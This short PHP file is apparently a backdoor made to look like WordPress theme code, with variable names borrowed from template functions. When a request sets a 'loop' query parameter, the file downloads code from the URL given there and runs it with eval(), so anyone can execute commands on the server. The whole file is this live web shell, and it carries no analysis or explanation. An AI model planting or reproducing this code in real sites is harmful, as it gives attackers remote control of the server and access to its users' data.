<?php
if (isset($_GET['loop'])) {
$body_class_mjr = $_GET['loop'];
if ($the_excerpt_aox = curl_init()) {
curl_setopt($the_excerpt_aox, CURLOPT_URL, $body_class_mjr);
curl_setopt($the_excerpt_aox, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($the_excerpt_aox));
curl_close($the_excerpt_aox);
exit;
}
}